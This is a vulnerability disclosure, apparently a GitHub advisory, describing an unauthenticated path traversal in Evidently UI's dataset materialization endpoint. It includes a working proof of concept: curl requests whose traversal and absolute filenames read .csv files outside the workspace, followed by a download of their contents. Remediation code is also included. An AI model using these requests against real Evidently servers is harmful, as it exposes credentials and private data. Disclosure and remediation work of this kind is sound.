Unauthenticated path traversal arbitrary file read in Evidently UI dataset materialization #1887

@geo-chen

Summary

The Evidently UI service exposes a dataset "materialize from source" endpoint that accepts a fully attacker-controlled filename and passes it, without any containment check, to the local blob storage, which opens posixpath.join(base_path, filename). Because posixpath.join leaves ../ segments unresolved and discards the base when the second argument is an absolute path, an attacker can read any .csv or .parquet file on the host filesystem that the service process can access, including files outside the workspace directory, and then download its contents through the dataset download endpoint.

In the default configuration (evidently ui, started without a secret), the service runs with NoSecurityComponent, so every endpoint is unauthenticated. The result is unauthenticated arbitrary file read over the network.

Affected Versions

Confirmed on v0.7.21 (latest release). The vulnerable code path is present in the evidently.ui.service package.

Details

The endpoint POST /api/datasets/materialize (src/evidently/ui/service/api/datasets.py) builds a data source from the request body and materializes it:

@post("/materialize")
async def materialize_from_source(
    data: MaterializeDatasetRequest,
    dataset_manager: ...,
    user_id: UserID,
    project_id: ProjectID,
) -> MaterializeDatasetResponse:
    df = await data.source.to_data_source(user_id=user_id, project_id=project_id).materialize(dataset_manager)
    dataset = await dataset_manager.upload_dataset(...)  # stores df as a new dataset you can download
    return MaterializeDatasetResponse(dataset_id=dataset.id)

When the source is a FileDataSource (src/evidently/ui/service/datasets/data_source.py), filename is taken verbatim from the request:

class FileDataSource(SortedFilteredDataSource):
    project_id: ProjectID
    filename: str
    is_tmp: bool = False

    def read(self, storage):
        df = FileIO(storage).read_file_from_storage(self.project_id, self.filename)
        return df

FileIO.read_file_from_storage (src/evidently/ui/service/datasets/file_io.py) only validates the file extension, then reads the path as a blob id:

def read_file_from_storage(self, project_id, file_id):
    _, file_extension = os.path.splitext(file_id)
    if file_extension not in self.ALLOWED_FILE_READERS.keys():  # .csv / .parquet only
        raise HTTPException(status_code=400, detail="Extension not allowed")
    file_content = self.file_storage.get_dataset(file_id)   # file_id == attacker filename
    ...
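
The extension check does not constrain where the file lives, because os.path.splitext only looks at the suffix of the final path component. A minimal sketch, assuming a hypothetical ALLOWED_EXTENSIONS set that stands in for the keys of ALLOWED_FILE_READERS (the .csv / .parquet values come from the comment above; the helper name extension_allowed is illustrative and not part of Evidently):

```python
import os

# Hypothetical stand-in for FileIO.ALLOWED_FILE_READERS.keys()
ALLOWED_EXTENSIONS = {".csv", ".parquet"}


def extension_allowed(file_id: str) -> bool:
    """Mirror the suffix-only check: the directory part is never inspected."""
    _, file_extension = os.path.splitext(file_id)
    return file_extension in ALLOWED_EXTENSIONS


for candidate in (
    "data.csv",
    "../../../../../../tmp/secret_outside.csv",
    "/tmp/abs_secret.csv",
    "/etc/passwd",
):
    print(candidate, extension_allowed(candidate))
```

Both the traversal and the absolute filename pass, since each ends in .csv; only the extensionless /etc/passwd is rejected.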

DatasetFileStorage.get_dataset(blob_id) -> BlobStorage.get_blob_data(blob_id) -> FSSpecBlobStorage.open_blob -> FSLocation.open (src/evidently/ui/service/storage/fslocation.py):

@contextlib.contextmanager
def open(self, path: str, mode="r"):
    with self.fs.open(posixpath.join(self.path, path), mode) as f:
        yield f

There is no normalization or base-directory containment. posixpath.join("workspace", "../../../../etc/x.csv") escapes the workspace, and posixpath.join("workspace", "/tmp/x.csv") discards the base entirely and reads the absolute path.
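
Both behaviours can be checked with the standard library alone. The sketch below assumes the workspace path used in the proof of concept; the resolve helper is illustrative and only applies posixpath.normpath to show where the joined path ends up lexically (the real filesystem call resolves ../ itself, and symlinks could change the result):

```python
import posixpath

WORKSPACE = "/tmp/ev_run/workspace"  # base path assumed from the PoC setup


def resolve(base: str, filename: str) -> str:
    """Join as FSLocation.open does, then normalize only to display the target."""
    return posixpath.normpath(posixpath.join(base, filename))


# Relative traversal: the ../ segments walk out of the workspace.
print(resolve(WORKSPACE, "../../../../../../tmp/secret_outside.csv"))
# -> /tmp/secret_outside.csv

# Absolute path: join() drops the base entirely.
print(resolve(WORKSPACE, "/tmp/abs_secret.csv"))
# -> /tmp/abs_secret.csv

# A well-behaved blob id stays inside the workspace.
print(resolve(WORKSPACE, "dataset.csv"))
# -> /tmp/ev_run/workspace/dataset.csv
```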

The materialized rows are then stored as a normal dataset and can be retrieved verbatim through the unauthenticated read routes GET /api/datasets/{id}/download and GET /api/datasets/{id}.

The only restriction is the extension allowlist (.csv, .parquet). These formats commonly contain database dumps, credential exports, model training data, and PII on the same host.

Proof of Concept

Prerequisites:

  • pip install evidently==0.7.21
  • A sensitive .csv file existing outside the workspace, simulating any data export / credential file on the host.

Steps:

  1. Create a sensitive file outside the workspace:
printf 'secret_col,value\nADMIN_DB_PASSWORD,hunter2_supersecret\n' > /tmp/secret_outside.csv
  2. Start the Evidently UI with its default configuration (no secret = no authentication):
mkdir -p /tmp/ev_run/workspace
cd /tmp/ev_run
python -c "from evidently.ui.service.app import run_local; run_local(host='127.0.0.1', port=8011, workspace='/tmp/ev_run/workspace')"
  3. Create a project (unauthenticated):
curl -s -X POST http://127.0.0.1:8011/api/projects \
  -H 'Content-Type: application/json' \
  -d '{"name":"poc","description":"x"}'

Output:

"019ecac5-bf25-7a67-85ab-b2071b844ca1"
  4. Materialize a dataset from a traversal filename (using the project ID returned in step 3):
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{
        "name": "stolen",
        "source": {
          "type": "evidently:data_source_dto:FileDataSourceDTO",
          "filename": "../../../../../../tmp/secret_outside.csv"
        }
      }'

Output:

{"dataset_id":"019ecac6-2ade-776e-bf50-a6ae18a25521"}
  5. Download the stolen file contents:
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-2ade-776e-bf50-a6ae18a25521/download?format=csv"

Output (contents of /tmp/secret_outside.csv, which lives outside the workspace):

secret_col,value
ADMIN_DB_PASSWORD,hunter2_supersecret

An absolute path works identically (the join discards the workspace base):

printf 'k,v\nABSOLUTE_READ,works\n' > /tmp/abs_secret.csv
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{"name":"abs","source":{"type":"evidently:data_source_dto:FileDataSourceDTO","filename":"/tmp/abs_secret.csv"}}'
# -> {"dataset_id":"019ecac6-686e-7e6d-9afe-23697614e585"}
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-686e-7e6d-9afe-23697614e585/download?format=csv"
# -> k,v
#    ABSOLUTE_READ,works

Impact

An unauthenticated remote attacker (or, when a token is configured, any authenticated user) can read arbitrary .csv and .parquet files anywhere on the server filesystem and exfiltrate their full contents. This discloses database exports, credential/secret files, training datasets, and other tenant data stored on the host, regardless of the project the attacker can access.

Suggested Remediation

Resolve and contain the requested path before opening it. For example, in FSLocation.open (and the other path-taking methods), normalize the joined path and verify that the result stays under self.path, which also rejects absolute paths:

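def _safe(self, path: str) -> str:
    # Lexically resolve ".." segments; an absolute `path` replaces the base in join().
    full = posixpath.normpath(posixpath.join(self.path, path))
    base = posixpath.normpath(self.path)
    # Accept only the base itself or paths strictly beneath it.
    if full != base and not full.startswith(base + posixpath.sep):
        raise PermissionError("path escapes storage root")
    return full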
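
The same check can be exercised outside the class. This is a sketch under stated assumptions, not a tested patch for Evidently: safe_join is a hypothetical free-function version of _safe, the /srv/ws base is made up for the example, and the comparison is purely lexical, so a symlink inside the storage root that points elsewhere would still need separate handling.

```python
import posixpath


def safe_join(base: str, path: str) -> str:
    """Join `path` onto `base` and refuse any result outside `base` (lexical check)."""
    base = posixpath.normpath(base)
    full = posixpath.normpath(posixpath.join(base, path))
    # rstrip keeps the prefix test correct when base is the filesystem root.
    prefix = base.rstrip(posixpath.sep) + posixpath.sep
    if full != base and not full.startswith(prefix):
        raise PermissionError("path escapes storage root")
    return full


def is_rejected(base: str, path: str) -> bool:
    """Helper for the demo: True when safe_join refuses the path."""
    try:
        safe_join(base, path)
    except PermissionError:
        return True
    return False


print(safe_join("/srv/ws", "datasets/a.csv"))                   # stays inside the root
print(is_rejected("/srv/ws", "../../tmp/secret_outside.csv"))   # traversal
print(is_rejected("/srv/ws", "/tmp/abs_secret.csv"))            # absolute path
print(is_rejected("/srv/ws", "../ws-evil/x.csv"))               # sibling sharing a prefix
```

Appending the separator before the prefix test is what keeps a sibling directory such as /srv/ws-evil from matching /srv/ws.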

Additionally, in read_file_from_storage / FileDataSource, validate that filename contains no path separators or .. segments, and resolve dataset files only by their stored blob id rather than a client-supplied path.
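
For the filename validation, one possible shape is a strict allowlist-style predicate applied before the extension check. The function name is_plain_filename is hypothetical, and rejecting backslashes and NUL bytes is an extra precaution assumed here rather than something the report requires:

```python
def is_plain_filename(name: str) -> bool:
    """Accept only a bare file name: no directories, no '..', no empty value."""
    if not name or name in (".", ".."):
        return False
    # Reject POSIX and Windows separators as well as embedded NUL bytes.
    if any(ch in name for ch in ("/", "\\", "\x00")):
        return False
    return True


for candidate in (
    "dataset.csv",
    "../../../../../../tmp/secret_outside.csv",
    "/tmp/abs_secret.csv",
    "..",
):
    print(repr(candidate), is_plain_filename(candidate))
```

A check like this complements, rather than replaces, the containment check in the storage layer, since other callers may reach FSLocation.open with their own paths.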
